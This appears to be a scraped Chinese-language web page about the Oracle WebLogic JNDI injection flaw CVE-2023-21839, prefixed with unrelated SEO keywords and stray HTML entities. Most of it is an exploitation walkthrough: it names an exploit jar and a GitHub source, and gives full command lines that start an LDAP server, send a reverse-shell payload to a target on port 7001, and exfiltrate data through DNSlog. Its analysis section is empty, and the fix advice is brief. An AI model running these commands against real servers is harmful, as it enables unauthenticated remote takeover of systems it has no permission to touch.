用二级域名做网站群,邻水建设局网站,腾讯云服务器centos做静态网站,工作服厂家联系方式一、漏洞概述
RCE漏洞#xff0c;该漏洞允许未经身份验证的远程#xff0c;通过T3/IIOP协议网络访问并破坏WebLogic服务器#xff0c;成功利用此漏洞可导致Oracle WebLogic服务器被接管#xff0c;通过rmi/ldap远程协议进行远程命令执行,当 JDK 版本过低或本地存在小工具该漏洞允许未经身份验证的远程通过T3/IIOP协议网络访问并破坏WebLogic服务器成功利用此漏洞可导致Oracle WebLogic服务器被接管通过rmi/ldap远程协议进行远程命令执行,当 JDK 版本过低或本地存在小工具javaSerializedData时可能导致远程代码执行。
由此可见CVE-2023-21839是一个weblogic的JNDI注入漏洞。
二、影响范围
Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0
三、利用方式
反弹shell
一、启用http://your-ip:7001/console可以看到登录界面 下载漏洞利用工具 JNDIExploit-1.4-SNAPSHOT.jar 二、启动ladp服务在kali上同时启动监听 vps上使用JNDIExploit开启ldap协议服务这里注意 1389跟3456端口开放
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14漏洞EXP下载
https://github.com/DXask88MA/Weblogic-CVE-2023-21839三、启动EXP注意jdk版本仍需低版本原装JDK17不必卸载下载一个低版本的JDK之后切换即可
java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999java -jar 目标服务器ip地址:端口 ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口没有明显的变化 四、查看LDAP服务器成功获取 DNSlog流量外带
eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip7001 ldap:// xxxxxx.dnslog.cnjava -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap:// vqd5uu.dnslog.cn还可以利用工具实现。。。。
四、漏洞解析
五、漏洞防护
下载最新补丁链接https://support.oracle.com/rs?typedocid2917213.2
限制T3协议访问